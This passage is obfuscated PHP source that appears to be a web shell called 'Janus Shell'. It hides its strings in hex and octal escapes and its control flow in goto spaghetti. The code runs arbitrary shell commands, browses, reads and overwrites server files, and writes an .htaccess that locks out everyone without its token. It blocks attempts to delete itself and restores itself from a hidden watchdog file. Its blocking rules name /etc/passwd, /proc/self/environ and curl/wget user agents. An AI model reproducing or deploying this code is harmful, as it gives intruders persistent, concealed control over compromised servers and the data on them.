"\x23\x20\40\40\40\x20\x52\x65\x77\x72\x69\x74\145\x43\157\x6e\x64\x20\45\x7b\x51\x55\105\122\131\137\x53\x54\122\111\x4e\x47\x7d\x20\41\152\x61\156\165\x73\137\x74\x6f\x6b\x65\156\x3d{$zqG9F}\12"; goto rzj_z; IJ2Uu: $sE6ux .= "\x3c\x2f\x49\146\x4d\157\144\165\154\145\76\12\12"; goto Sfc_X; o1H_R: $sE6ux .= "\43\40\x44\151\x73\141\142\x6c\x65\40\x73\x65\x72\166\x65\x72\x20\x69\156\146\x6f\40\x64\x69\x20\145\x72\x72\x6f\162\x20\x70\x61\x67\145\163\12"; goto IGoVr; CAAZq: $sE6ux .= "\74\x49\146\115\x6f\144\165\154\x65\40\155\157\144\x5f\162\x65\x77\x72\151\x74\x65\56\143\76\12"; goto VfWDb; cMpDh: $rwOj3 = ''; goto O8Zub; N4PyA: $sE6ux .= "\43\40\x48\151\x64\x65\40\x73\145\x72\x76\x65\x72\40\163\151\x67\156\x61\164\165\162\145\xa"; goto kz8QG; njmAB: $sE6ux .= "\74\x2f\x4c\x69\x6d\x69\164\105\170\x63\145\x70\x74\76\12\12"; goto AKPpi; y23hf: $sE6ux .= "\x20\x20\40\40\122\x65\x77\x72\x69\164\145\103\157\x6e\x64\40\45\173\x51\x55\105\122\x59\x5f\123\x54\122\x49\x4e\107\x7d\x20\x28\x5c\45\60\x30\174\x5c\45\x30\61\x7c\134\45\x30\62\x7c\134\45\x30\63\174\134\45\60\x34\x7c\x5c\45\x30\65\174\134\x25\x30\66\174\x5c\x25\x30\x37\x7c\x5c\x25\x30\x38\x7c\x5c\x25\x30\71\174\x5c\x25\60\141\x7c\x5c\45\x30\x62\x7c\x5c\45\60\x63\x7c\134\x25\x30\144\174\x5c\45\60\x65\x7c\134\45\x30\146\x29\40\x5b\116\103\54\x4f\122\135\12"; goto JAtcV; ZzevO: $sE6ux .= "\40\40\x20\x20\122\145\167\162\151\x74\x65\x43\157\x6e\x64\40\45\x7b\121\x55\x45\x52\x59\137\x53\124\122\x49\116\x47\175\x20\50\x5c\x2f\145\x74\x63\134\x2f\160\141\x73\163\167\x64\x7c\134\57\160\x72\157\143\134\57\x73\145\x6c\146\x5c\57\145\x6e\166\x69\162\x6f\156\x7c\x5c\x2f\x70\162\x6f\x63\x5c\57\x76\x65\162\x73\151\157\x6e\174\x5c\57\x70\162\157\x63\x5c\57\143\x6d\x64\154\151\156\x65\x7c\x5c\x2f\145\x74\143\x5c\x2f\150\157\163\x74\163\174\x5c\57\145\x74\x63\x5c\x2f\163\x68\141\x64\x6f\x77\x29\x20\133\x4e\103\135\xa"; goto CQa6u; UHLa2: $sE6ux .= "\x3c\111\x66\115\157\144\165\x6c\x65\40\155\x6f\144\x5f\x68\145\141\144\145\162\x73\56\143\x3e\12"; goto Ne0ep; DFcic: $sE6ux .= "\43\x20\74\x2f\x49\146\115\x6f\x64\165\x6c\145\x3e\xa\xa"; goto uuMa3; Ot_bz: $sE6ux .= "\43\x20\40\x20\40\40\122\x65\x77\x72\x69\x74\x65\105\156\x67\151\x6e\145\x20\x4f\156\xa"; goto OO33q; kyxIh: $sE6ux .= "\74\x2f\111\146\115\x6f\x64\x75\x6c\x65\x3e\xa\12"; goto jJyoA; qAvRc: $sE6ux .= "\40\x20\40\40\122\145\167\x72\x69\x74\145\x43\157\x6e\144\x20\45\x7b\x51\x55\105\122\x59\137\x53\124\122\111\x4e\107\175\40\x28\x5c{$qkWJG}\x28\x47\105\124\x7c\x50\117\x53\124\x7c\122\x45\x51\125\x45\x53\124\174\x43\x4f\117\113\x49\x45\x7c\x53\x45\122\x56\x45\x52\x7c\x46\111\x4c\x45\x53\174\123\x45\123\123\111\x4f\x4e\x7c\105\116\126\x29\51\x20\x5b\116\x43\135\12"; goto D8reh; DhVkq: $sE6ux .= "\x20\x20\x20\x20\122\x65\x77\x72\x69\x74\x65\122\165\x6c\145\x20\136\x28\56\52\51\44\x20\55\x20\x5b\x46\x2c\x4c\135\12"; goto Ts7Cx; M87Ez: $sE6ux .= "\74\57\x4c\x69\155\x69\x74\x45\x78\143\x65\160\x74\76\12\12"; goto haic6; uzWQm: $sE6ux .= "\x23\40\x3c\111\146\x4d\x6f\x64\x75\x6c\x65\40\155\157\x64\137\162\145\167\162\x69\164\x65\x2e\143\x3e\xa"; goto Ot_bz; EzrNh: $sE6ux .= "\x20\x20\x20\x20\122\145\167\x72\x69\164\x65\122\165\154\145\x20\x5e\x28\56\52\51\44\40\55\x20\x5b\106\x2c\x4c\135\xa"; goto VcqXc; l1pru: $sE6ux .= "\74\106\x69\154\145\x73\115\x61\164\x63\150\40\x22\134\x2e\50\x62\x61\x6b\174\x62\x61\x63\153\x75\160\174\x6f\x6c\144\174\157\162\x69\147\x7c\x73\x61\x76\145\x7c\x73\x77\160\x7c\164\x6d\x70\x7c\154\157\147\174\163\x71\154\x7c\163\x71\154\151\x74\145\174\x64\142\174\x69\156\151\174\x63\x6f\x6e\x66\174\x63\157\x6e\x66\x69\147\x7c\150\x74\x61\143\143\145\x73\x73\174\x68\164\x70\141\163\163\x77\144\174\x67\x69\x74\x7c\x73\166\x6e\x7c\145\156\x76\x7c\145\x6e\x76\134\56\154\x6f\143\141\x6c\51\x24\42\76\xa"; goto kzav8; yjH7L: $rwOj3 = bin2hex(openssl_random_pseudo_bytes(16)); goto wLZpN; CwwnJ: $sE6ux .= "\x23\40\102\x6c\x6f\143\x6b\40\143\157\x6d\x6d\157\156\40\145\170\x70\154\x6f\151\164\x20\x70\141\164\164\x65\x72\156\163\xa"; goto ao2Q3; x94hk: @chmod($vtnOm, 0600); goto bKAzK; AFFFB: $sE6ux .= "\43\x20\75\x3d\75\75\75\x3d\x3d\x3d\75\75\75\x3d\75\75\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\75\75\x3d\x3d\75\x3d\x3d\75\x3d\75\75\75\x3d\75\75\75\75\x3d\x3d\75\x3d\xa\12"; goto N4PyA; O8Zub: if (function_exists("\162\x61\x6e\144\157\x6d\x5f\x62\171\164\x65\163")) { goto n62rK; } goto K5fny; TOUVn: $sE6ux .= "\74\x49\x66\115\157\x64\165\154\x65\x20\155\x6f\x64\137\162\x65\x77\162\x69\164\145\x2e\x63\x3e\xa"; goto ilSv3; iXwAN: $sE6ux .= "\x20\40\x20\x20\x53\145\164\x45\x6e\166\x49\x66\40\121\x75\145\162\171\123\x74\x72\x69\156\147\x20\x22\152\x61\156\165\163\x5f\x74\157\x6b\x65\x6e\x3d{$zqG9F}\x22\40\101\x4c\x4c\x4f\x57\x5f\124\117\x4b\x45\116\12"; goto YILZg; KF2al: $sE6ux .= "\40\40\x20\40\122\x65\167\x72\x69\x74\x65\103\x6f\x6e\144\40\45\x7b\x51\125\105\122\x59\x5f\x53\x54\122\x49\116\107\x7d\40\x28\x5c\74\163\x63\162\151\x70\x74\x7c\x5c\74\151\146\x72\x61\155\145\x7c\134\74\157\x62\x6a\145\x63\164\174\134\74\x65\x6d\x62\145\144\174\134\x3c\x61\x70\x70\154\x65\x74\x7c\134\74\155\x65\164\141\x7c\134\x3c\154\151\x6e\x6b\x7c\134\x3c\163\x74\171\154\x65\x7c\x5c\x3c\146\157\162\x6d\174\x5c\x3c\151\156\x70\x75\164\x7c\x5c\74\x74\x65\170\x74\x61\162\145\141\x7c\134\x3c\x73\x65\154\x65\x63\x74\x7c\x5c\x3c\x62\x75\164\x74\x6f\156\51\40\133\116\x43\54\x4f\122\x5d\xa"; goto iM3P0; nCQ_y: $sE6ux .= "\43\40\102\154\157\143\153\x20\112\141\156\165\163\40\142\x61\x63\153\x75\x70\40\x64\x61\156\x20\x73\145\143\162\145\164\x20\x66\x69\154\x65\163\xa"; goto VHPVE; R9koy: $sE6ux .= "\43\40\104\151\163\141\142\154\145\x20\x64\x69\162\145\x63\x74\157\x72\171\40\x6c\151\x73\164\x69\156\147\xa"; goto hjAmP; pBmGu: $sE6ux .= "\x23\x20\x42\154\x6f\x63\153\40\x73\165\x73\x70\x69\143\151\157\165\163\x20\x72\145\x71\x75\145\163\x74\x20\x6d\x65\164\x68\x6f\x64\163\12"; goto gUZPe; oRQEh: $sE6ux .= "\x23\x20\x3d\x3d\x3d\x3d\75\75\x3d\75\75\x3d\75\75\75\75\75\75\x3d\75\x3d\75\75\x3d\x3d\x3d\75\x3d\75\x3d\x3d\x3d\x3d\x3d\75\x3d\75\x3d\x3d\75\x3d\x3d\x3d\x3d\x3d\x3d\12"; goto Z8bpC; kXpcI: $sE6ux .= "\x20\x20\40\40\117\162\x64\145\162\40\x44\x65\x6e\x79\x2c\x41\x6c\x6c\x6f\x77\12"; goto DMGxx; tz1ST: $sE6ux .= "\40\x20\40\x20\x52\x65\x77\x72\151\x74\x65\103\157\156\x64\x20\x25\x7b\121\x55\105\x52\x59\137\123\124\122\111\x4e\x47\x7d\40\41\152\141\x6e\x75\163\137\x74\x6f\153\x65\156\x3d{$zqG9F}\xa"; goto cFdSM; gS5nm: $sE6ux .= "\74\x49\x66\x4d\x6f\x64\165\154\145\x20\x6d\x6f\x64\x5f\162\x65\167\x72\151\164\x65\56\143\76\xa"; goto d2jfB; ou5Am: $sE6ux .= "\x3c\x2f\x49\146\x4d\x6f\144\x75\154\x65\x3e\xa\12"; goto oVkFf; R3jM0: $sE6ux .= "\x20\40\40\40\x52\x65\167\x72\x69\164\145\x43\x6f\156\x64\x20\45\173\122\105\121\x55\x45\x53\124\137\x55\x52\111\175\40\x5c\56\x28\142\x61\x6b\174\142\x61\143\153\x75\160\x7c\157\154\144\174\157\x72\151\147\174\163\x61\x76\x65\174\163\167\160\174\x74\x6d\160\x7c\154\157\147\x7c\163\161\154\174\x73\161\154\151\164\145\x7c\144\142\174\x69\x6e\151\x7c\x63\x6f\156\146\174\x63\157\156\x66\x69\147\x7c\x68\x74\141\x63\x63\x65\x73\163\174\150\164\160\141\x73\x73\x77\x64\174\147\x69\x74\174\163\166\156\x7c\x65\x6e\x76\174\x65\156\x76\x5c\x2e\x6c\157\x63\141\x6c\x7c\163\x68\x7c\142\x61\164\x7c\143\x6d\144\174\x65\x78\145\174\144\x6c\x6c\x7c\x73\x6f\174\144\171\x6c\151\x62\x29\44\x20\x5b\116\x43\x2c\x4f\122\135\12"; goto Q4bMz; B5hWV: $sE6ux .= "\43\40\x42\154\157\x63\153\40\141\143\x63\145\163\163\40\164\157\x20\142\141\143\x6b\165\x70\54\x20\x6c\x6f\x67\54\x20\x64\x61\x6e\40\163\145\156\163\x69\x74\x69\x76\145\40\146\x69\154\x65\163\12"; goto l1pru; OuG28: $sE6ux .= "\43\x20\105\x6e\150\141\156\x63\145\144\40\101\165\164\157\55\x44\x65\x66\x65\156\x64\x20\x50\162\x6f\x74\145\143\x74\151\x6f\x6e\x20\x2d\40\112\x61\x6e\x75\163\x20\x53\150\145\154\154\xa"; goto CQVQx; DMGxx: $sE6ux .= "\x20\x20\x20\40\104\145\156\171\x20\146\162\x6f\x6d\x20\141\x6c\x6c\12"; goto LrVjn; K3qMq: $sE6ux .= "\x49\x6e\144\145\170\111\147\x6e\157\162\x65\40\x2a\xa\12"; goto B5hWV; DWdVP: $zqG9F = md5($qY16M . "\112\101\116\x55\x53\x5f\x41\125\x54\117\137\104\x45\106\105\116\104\x5f" . date("\x59\55\x6d\55\144") . $rwOj3); goto ejzep; Z8bpC: if (!@file_put_contents($rE5PO, $sE6ux)) { goto kgmnI; } goto vk8vO; aeWTf: $sE6ux .= "\40\x20\x20\x20\x52\x65\x77\x72\151\x74\x65\103\157\x6e\144\x20\x25\173\x51\125\105\x52\131\x5f\123\x54\x52\111\116\x47\x7d\40\x21\x6a\x61\x6e\165\x73\x5f\164\x6f\x6b\x65\x6e\x3d{$zqG9F}\12"; goto vEjX5; vok9Q: $sE6ux .= "\x3c\x2f\x49\146\115\x6f\x64\165\154\x65\76\xa\xa"; goto ZHAju; PL4bK: $sE6ux .= "\x3c\57\x49\x66\x4d\157\144\x75\154\145\x3e\12\xa"; goto LMtO_; n3qtp: $sE6ux .= "\40\x20\x20\x20\122\x65\167\162\x69\164\145\103\x6f\x6e\144\x20\x25\x7b\110\x54\124\120\x5f\101\x43\103\x45\120\x54\175\40\x5e\x24\x20\x5b\x4f\122\135\xa"; goto hn2Pk; cE1p2: $sE6ux .= "\x20\x20\40\x20\122\145\167\x72\x69\164\x65\x52\165\154\x65\40\x5e\x28\56\52\x29\44\40\55\40\x5b\x46\54\x4c\135\xa"; goto x9gps; zuET9: $sE6ux .= "\40\40\40\x20\x52\145\167\162\151\164\145\103\x6f\156\x64\40\45\173\x48\124\x54\120\x5f\x55\123\x45\122\137\x41\x47\x45\x4e\124\175\x20\x28\x63\x75\162\x6c\x7c\167\147\x65\x74\174\160\171\164\x68\157\x6e\174\160\145\162\154\x7c\x72\165\142\171\174\x6a\x61\166\x61\174\x67\157\55\150\164\164\x70\x29\40\x5b\116\x43\x5d\12"; goto lust7; D8reh: $sE6ux .= "\x20\40\40\40\x52\x65\167\x72\151\164\x65\x52\x75\x6c\x65\40\x5e\50\56\x2a\x29\44\x20\x2d\x20\133\x46\54\x4c\x5d\xa"; goto PbQE0; U7D8f: $sE6ux .= "\40\40\x20\x20\122\145\167\162\151\164\x65\103\x6f\156\x64\40\45\x7b\x52\105\121\x55\105\x53\124\x5f\x55\122\111\x7d\40\x28\x5c\56\134\x2e\134\45\62\x66\x7c\x5c\56\x5c\x2e\x5c\45\65\143\x7c\134\56\134\x2e\x5c\x25\62\145\174\x5c\x2e\x5c\x2e\134\45\62\65\x32\146\x7c\x5c\x2e\x5c\x2e\x5c\x25\x32\65\x35\x63\x7c\134\x2e\x5c\56\x5c\x25\143\x30\x5c\x25\x61\146\174\134\56\x5c\56\x5c\45\143\61\134\45\71\143\51\40\x5b\116\x43\x5d\12"; goto sHTlt; wh00H: $sE6ux .= "\x23\x20\x53\x65\143\165\162\151\164\x79\x20\110\x65\141\x64\x65\162\x73\xa"; goto GGkCf; SRg6Z: $sE6ux .= "\40\40\40\x20\x48\x65\141\x64\x65\162\40\141\154\167\141\x79\x73\40\x73\x65\164\40\x58\55\x46\162\x61\x6d\x65\x2d\x4f\x70\164\151\x6f\156\x73\x20\x22\104\105\x4e\x59\x22\12"; goto rUT4Q; djDv4: $sE6ux .= "\x3c\57\106\x69\154\x65\163\76\12\xa"; goto DJqgg; Xsglt: } goto wCGPY; SLKdB: $fzeLt = dirname($zJsLG) . DIRECTORY_SEPARATOR . "\x2e\152\x61\156\x75\163\x5f\163\x65\143\162\145\164\137" . substr(md5($zJsLG), 0, 8); goto xLdqa; WG9CP: echo $_SERVER["\120\x48\120\x5f\x53\x45\114\x46"]; goto WPEdu; rWr34: $yluvp = false; goto lE63w; aUrjg: ob_start(); goto ihL3b; yqo_I: exit; goto w1NFW; ZQB41: A3x6D($zJsLG, $etpkF, $Yxoh6); goto oG66x; G1ubf: $_SESSION["\x6a\141\x6e\165\x73\137\141\165\x74\x68\x65\156\x74\x69\143\x61\x74\x65\x64"] = true; goto jeT10; ZcnRK: $sv0qE = json_decode($JUlBm, true); goto hbdEQ; ndKJC: $_POST = $sv0qE; goto vtjgK; qasSI: $_POST = $sv0qE; goto FarOw; NC6ql: $_SESSION["\143\x77\144"] = getcwd(); goto tvKy0; cSuWA: if (!($_SERVER["\122\x45\x51\125\105\123\x54\x5f\115\x45\124\110\x4f\104"] === "\107\x45\x54" && !isset($_POST["\x70"]) && empty($_POST))) { goto CMWuF; } goto kjN9A; L2gwj: switch ($VtInv) { case "\147\x65\x74\x5f\143\157\156\164\x65\x78\164": goto XmyrM; k1MXh: goto vbH70; goto y8ekQ; JZF7E: $v1Pog = ["\163\164\141\164\x75\163" => "\163\165\x63\143\145\x73\163", "\143\167\x64" => $_SESSION["\143\x77\x64"], "\163\171\163\151\x6e\146\157" => $TbNC1, "\x73\x68\145\154\x6c\x5f\x64\x69\x72" => dirname(__FILE__), "\x75\x73\x65\x72" => $TbNC1["\x75\x73\145\x72"], "\x68\157\163\x74\156\141\155\x65" => $TbNC1["\150\x6f\163\164\156\141\x6d\145"]]; goto k1MXh; XmyrM: $TbNC1 = cY_0B(); goto JZF7E; y8ekQ: case "\142\x72\x6f\167\x73\x65": goto JZkAA; lcNZs: foreach ($JYyBz as $Q0s1i) { goto Sirq4; H7eJv: $jFVTT = ["\x6a\141\x6e\x75\163", "\x76\56\x36\56\60", "\166\x2e\65\56\60", "\x76\56\64\56\60", "\166\x2e\63\56\60", "\x76\x2e\62\56\x30", "\x76\x2e\x31\x2e\x30", "\x6d\x69\156\151\x2d\x73\x68\x65\x6c\154"]; goto u00P1; adv_w: $wXtrg = ["\x6a\x61\x6e\165\163\x2e\x70\x68\x70", "\152\141\156\165\x73\x2d\145\156\143\x2e\160\x68\x70"]; goto D_6Mt; NI4Ex: $KLrez = $j3_hR . DIRECTORY_SEPARATOR . $Q0s1i; goto f1SvP; D_6Mt: foreach ($wXtrg as $fhQh_) { goto RLHFt; BlHgL: EoJV8: goto VRZeI; ym9BM: goto DR5cZ; goto BlHgL; RLHFt: if (!file_exists($KLrez . DIRECTORY_SEPARATOR . $fhQh_)) { goto EoJV8; } goto btUci; VRZeI: CZ0Jw: goto nu254; btUci: $VY4VS = true; goto ym9BM; nu254: } goto UZWI9; IpI2Z: LXsfe: goto vV74q; ZNBK7: goto Aaqnt; goto THiVP; qZudy: $p2RFD[] = ["\x6e\141\155\x65" => $Q0s1i, "\160\141\164\150" => $KLrez, "\x69\x73\x5f\x64\x69\162" => $pze38, "\x69\x73\137\x6a\x61\156\165\x73\x5f\x66\x6f\154\x64\145\162" => $VY4VS, "\163\x69\x7a\145" => $pze38 ? "\x2d" : o1uoT(filesize($KLrez)), "\x70\x65\x72\155\x73" => lCeO0($KLrez), "\146\x75\154\x6c\137\x70\145\162\155\x73" => JzJWy($KLrez), "\151\163\137\167\162\151\x74\141\142\x6c\145" => is_writable($KLrez), "\x6d\x74\151\x6d\145" => date("\131\55\x6d\x2d\x64\x20\110\x3a\151\72\x73", filemtime($KLrez))]; goto yp12B; MqIJX: if ($VY4VS) { goto g0czG; } goto H7eJv; THiVP: Cl2Tj: goto NI4Ex; Sirq4: if (!($Q0s1i === "\x2e" || $Q0s1i === "\56\56")) { goto Cl2Tj; } goto ZNBK7; UZWI9: DR5cZ: goto MqIJX; vV74q: g0czG: goto ihDW4; yp12B: Aaqnt: goto GRdlK; ihDW4: B6d4b: goto qZudy; CAr_E: $VY4VS = false; goto pER1C; u00P1: foreach ($jFVTT as $G6Mdr) { goto z7sd5; i7g80: ZrZWV: goto ksXdq; eNJLW: $VY4VS = true; goto VhkGt; z7sd5: if (!(stripos($Q0s1i, $G6Mdr) !== false)) { goto ZrZWV; } goto eNJLW; VhkGt: goto LXsfe; goto i7g80; ksXdq: x3JE2: goto D_Fcd; D_Fcd: } goto IpI2Z; f1SvP: $pze38 = is_dir($KLrez); goto CAr_E; pER1C: if (!($pze38 && $Q0s1i !== "\56\x2e")) { goto B6d4b; } goto adv_w; GRdlK: } goto WWlIV; fNJcb: $j3_hR = $_SESSION["\143\x77\144"]; goto sDUJ0; tMVnn: if (!($j3_hR !== "\57")) { goto YcXLv; } goto YiLah; ZFBAS: $JYyBz = scandir($j3_hR); goto lcNZs; KA5XJ: if (!(!$j3_hR || !is_dir($j3_hR))) { goto JUpu2; } goto fNJcb; Holjd: $p2RFD = []; goto ZFBAS; L7eU2: $_SESSION["\143\167\144"] = $j3_hR; goto Holjd; CSp3u: $v1Pog = ["\x73\164\141\x74\x75\x73" => "\163\165\143\x63\145\163\163", "\143\x77\144" => $j3_hR, "\x66\x69\x6c\x65\163" => $p2RFD]; goto EfuNv; sfi_p: usort($p2RFD, function ($pEWTY, $dV5Pr) { goto uWkJX; uWkJX: if (!($pEWTY["\x69\x73\137\144\x69\x72"] !== $dV5Pr["\x69\163\x5f\x64\x69\162"])) { goto bFAHw; } goto hcL1g; c_GRl: bFAHw: goto wi86D; hcL1g: return $pEWTY["\x69\163\137\x64\x69\162"] ? -1 : 1; goto c_GRl; wi86D: return strcasecmp($pEWTY["\156\x61\155\145"], $dV5Pr["\156\141\155\145"]); goto B3KKC; B3KKC: }); goto tMVnn; YiLah: $qrP32 = dirname($j3_hR); goto SFN0Y; SFN0Y: array_unshift($p2RFD, ["\x6e\x61\x6d\145" => "\56\x2e", "\x70\x61\164\150" => $qrP32, "\151\163\x5f\x64\x69\x72" => true, "\163\x69\172\x65" => "\x2d", "\160\x65\x72\x6d\163" => lCEo0($qrP32), "\x66\165\154\154\137\160\x65\x72\155\163" => JZjWY($qrP32), "\151\163\137\167\x72\151\x74\141\142\154\x65" => is_writable($qrP32), "\x6d\x74\x69\155\145" => "\55"]); goto fvuwb; sDUJ0: JUpu2: goto L7eU2; WWlIV: F82mg: goto sfi_p; JZkAA: $j3_hR = isset($_POST["\160\141\x74\150"]) ? realpath($_POST["\x70\x61\164\150"]) : $_SESSION["\x63\167\x64"]; goto KA5XJ; fvuwb: YcXLv: goto CSp3u; EfuNv: goto vbH70; goto Y2Wkl; Y2Wkl: case "\147\x65\x74\137\x66\x69\x6c\145\137\143\157\x6e\164\145\156\164": goto PKtkp; R74Z5: if (is_file($Q0s1i) && is_readable($Q0s1i)) { goto Zy6p9; } goto bU5ot; PKtkp: $Q0s1i = $_POST["\x70\141\164\x68"]; goto R74Z5; msLra: fRlVb: goto t9gDA; t9gDA: goto vbH70; goto k_xSF; bU5ot: $v1Pog["\155\145\163\x73\141\x67\145"] = "\106\x69\x6c\145\x20\156\157\x74\x20\146\x6f\x75\156\x64\x20\157\162\x20\x6e\x6f\x74\40\162\x65\141\144\141\142\154\145\x2e"; goto w84ge; w84ge: goto fRlVb; goto ZNsdM; qZEky: $v1Pog = ["\163\164\141\x74\x75\163" => "\163\x75\143\143\145\x73\163", "\x63\x6f\x6e\164\x65\156\164" => file_get_contents($Q0s1i)]; goto msLra; ZNsdM: Zy6p9: goto qZEky; k_xSF: case "\x73\141\x76\x65\x5f\146\x69\154\x65": goto lLcj7; brXhu: $Lrz4Z = $_POST["\x63\x6f\156\164\145\156\164"]; goto lEzyB; lEzyB: if (file_put_contents($j3_hR, $Lrz4Z) !== false) { goto U0y8g; } goto Q3lAz; Jt3ik: bITwX: goto AQw1S; PLgWE: goto bITwX; goto LIbc5; lLcj7: $j3_hR = $_POST["\x70\141\164\x68"]; goto brXhu; Eoh8z: $v1Pog = ["\x73\164\141\164\x75\163" => "\163\x75\143\143\x65\163\163", "\155\145\x73\x73\141\147\x65" => "\106\x69\x6c\145\40\163\141\166\145\x64\x20\163\165\143\x63\x65\163\163\146\x75\154\x6c\x79\x2e"]; goto Jt3ik; LIbc5: U0y8g: goto Eoh8z; Q3lAz: $v1Pog["\155\x65\163\163\x61\147\145"] = "\105\x72\x72\x6f\x72\x20\163\x61\166\151\x6e\x67\40\146\x69\154\145\x2e"; goto PLgWE; AQw1S: goto vbH70; goto NEZx4; NEZx4: case "\145\x78\145\x63": goto UZHD9; Js_68: $sCZwd = trim($I5WkF[1]); goto kSKFO; zXAsh: $v1Pog = ["\x73\164\x61\x74\165\x73" => "\x73\165\x63\143\x65\x73\x73", "\157\x75\164\160\x75\164" => '', "\143\167\144" => $_SESSION["\143\167\x64"]]; goto Yuf7s; xuvIs: if (!file_exists($etpkF)) { goto Z20oC; } goto vOsAd; g7eFq: if (preg_match("\57\136\143\144\134\x73\53\x28\56\52\51\x24\x2f\151", $oZAH8, $I5WkF)) { goto BF4y4; } goto WUQvE; Zy2KL: FHSlj: goto jgfoG; fVYIW: vlTGA: goto Zy2KL; bXDJJ: $BKvy0 = "\x43\x68\141\x6e\147\145\144\x20\144\151\x72\x65\143\164\157\x72\171\40\x74\x6f\40" . $_SESSION["\143\x77\x64"]; goto fVYIW; jgfoG: $v1Pog = ["\x73\x74\141\164\x75\x73" => "\163\165\143\x63\x65\163\163", "\157\165\164\160\x75\164" => htmlspecialchars((string) $BKvy0), "\x63\167\x64" => $_SESSION["\x63\167\144"]]; goto F3RiJ; OskWm: if (!preg_match("\57\x5c\x62\50\162\155\174\x75\156\x6c\x69\x6e\153\174\144\145\154\x7c\144\145\x6c\x65\x74\x65\x29\x5c\x73\53\57\x69", $oZAH8)) { goto FrI4D; } goto coBLd; jbPEw: luy6I: goto FIPeY; UZHD9: if (!empty(trim($_POST["\143\x6d\x64"]))) { goto luy6I; } goto zXAsh; mMvJU: $nZiB9 = basename($QEiJ4); goto U_DSn; sCYTy: $QEiJ4 = __FILE__; goto GQizO; qU8CA: $BKvy0 = "\x44\x69\x72\145\143\164\157\x72\x79\40\156\x6f\x74\40\x66\x6f\165\x6e\144\40\157\162\x20\x70\145\162\155\151\163\x73\151\157\x6e\x20\144\x65\x6e\151\x65\144\x3a\40" . htmlspecialchars($sCZwd); goto vab2b; h_b5F: unset($kmHPp); goto fIVfH; F3RiJ: goto vbH70; goto GmkvT; UfHJJ: $BKvy0 = "\x57\x41\x52\116\x49\x4e\x47\72\40\123\x68\145\x6c\154\x20\144\x65\154\x65\x74\x69\x6f\156\40\x64\x65\164\145\143\164\x65\144\x20\x61\x6e\x64\40\x72\145\163\164\157\162\x65\144\x21\12" . $BKvy0; goto ftCci; X584o: BF4y4: goto Js_68; SMEZM: $v1Pog = ["\x73\x74\141\x74\x75\163" => "\x65\162\162\x6f\162", "\157\x75\x74\160\x75\164" => "\103\x6f\155\x6d\x61\156\144\x20\x62\x6c\x6f\x63\153\145\144\72\x20\x41\x74\164\x65\x6d\x70\164\40\164\x6f\x20\x64\x65\154\145\164\145\x20\160\x72\x6f\164\145\143\164\145\144\x20\163\x68\145\x6c\154\40\144\145\x74\x65\x63\164\145\144", "\x63\x77\144" => $_SESSION["\143\x77\x64"]]; goto vfD4j; vOsAd: $kmHPp = true; goto GbxFq; vpKsd: FrI4D: goto g7eFq; iCYjM: F9i3i: goto smhWG; coBLd: if (!(stripos($oZAH8, $nZiB9) !== false || stripos($oZAH8, $ggdpe) !== false)) { goto qcGnN; } goto SMEZM; U_DSn: $HdHLn = ["\162\x6d\x5c\x73\x2b\x2e\52" . preg_quote($nZiB9, "\57"), "\165\156\154\x69\156\x6b\x5c\x73\x2a\x5c\50\56\x2a" . preg_quote($nZiB9, "\x2f"), "\162\155\134\163\53\55\x72\x66\134\163\53\x2e\x2a" . preg_quote($ggdpe, "\57"), "\x72\155\x5c\163\53\x2d\146\134\163\53\56\x2a" . preg_quote($nZiB9, "\57"), "\x64\x65\154\x5c\x73\53\56\52" . preg_quote($nZiB9, "\57"), "\144\x65\x6c\x65\164\145\134\x73\53\x2e\x2a" . preg_quote($nZiB9, "\57")]; goto w5cS5; Yuf7s: goto vbH70; goto jbPEw; Xxb7i: ZtmmD: goto OskWm; fIVfH: Z20oC: goto UfHJJ; vab2b: goto vlTGA; goto iCYjM; FIPeY: $oZAH8 = $_POST["\143\155\x64"]; goto sCYTy; dCD3G: if (file_exists($QEiJ4)) { goto I9dX8; } goto UFFQU; jZIZK: goto FHSlj; goto X584o; p06fY: qcGnN: goto vpKsd; WUQvE: $BKvy0 = ZMRP5($oZAH8 . "\40\x32\x3e\x26\61"); goto dCD3G; GQizO: $ggdpe = dirname($QEiJ4); goto mMvJU; kSKFO: if (@chdir($sCZwd)) { goto F9i3i; } goto qU8CA; ftCci: I9dX8: goto jZIZK; vfD4j: goto vbH70; goto p06fY; w5cS5: foreach ($HdHLn as $G6Mdr) { goto t9R4R; iM9Gg: goto vbH70; goto h1rnn; t9R4R: if (!preg_match("\x2f" . $G6Mdr . "\57\x69", $oZAH8)) { goto eiqdF; } goto Rf0iV; Rf0iV: $v1Pog = ["\x73\x74\x61\x74\x75\x73" => "\x65\162\x72\157\162", "\157\x75\164\x70\165\164" => "\103\x6f\x6d\155\x61\x6e\x64\x20\x62\154\157\x63\153\145\144\x3a\x20\x41\x74\x74\145\x6d\160\164\40\x74\157\40\x64\x65\154\145\x74\145\x20\x70\x72\x6f\x74\145\x63\164\145\x64\x20\163\150\145\x6c\x6c\x20\x64\145\164\x65\143\164\x65\x64", "\143\167\144" => $_SESSION["\x63\x77\x64"]]; goto iM9Gg; XLmmp: jwB4r: goto AiS9m; h1rnn: eiqdF: goto XLmmp; AiS9m: } goto Xxb7i; GbxFq: @(include_once $etpkF); goto h_b5F; smhWG: $_SESSION["\143\167\x64"] = getcwd(); goto bXDJJ; UFFQU: $etpkF = $ggdpe . DIRECTORY_SEPARATOR . "\56\x6a\x61\156\x75\163\x5f\167\141\164\x63\150\144\x6f\147\x5f" . substr(md5($QEiJ4), 0, 8) . "\56\160\x68\x70"; goto xuvIs; GmkvT: case "\144\x65\x6c\x65\x74\145": goto lvNV9; yxqKY: z1aRC: goto GsWrX; KbEXH: if (!file_exists($j3_hR . DIRECTORY_SEPARATOR . $nZiB9)) { goto mesR1; } goto ZXHO1; co0jg: kEoO1: goto m3_Wv; Cf0Aj: $QC2x2 = @realpath($j3_hR); goto AxJhG; mfrmD: if (is_dir($j3_hR)) { goto NBwqI; } goto ggtoX; ggtoX: $olcCz = @realpath($j3_hR); goto a9dQq; Qu81c: H6YzQ: goto C8S2Y; lvNV9: $j3_hR = $_POST["\160\141\164\150"]; goto CrQKs; sY7Nn: if (!($cxJYn && $ThaiK && $cxJYn === $ThaiK)) { goto j7ZU9; } goto HdHIJ; KdCjS: unset($kmHPp); goto Qu81c; s827Q: if (!($QC2x2 && $HkI9D && $QC2x2 === $HkI9D)) { goto eNwjD; } goto Rp1gP; kIlGH: @(include_once $Yxoh6); goto ix5o9; ZXHO1: $v1Pog = ["\163\164\141\x74\x75\163" => "\x65\162\x72\157\x72", "\x6d\x65\163\x73\x61\x67\x65" => 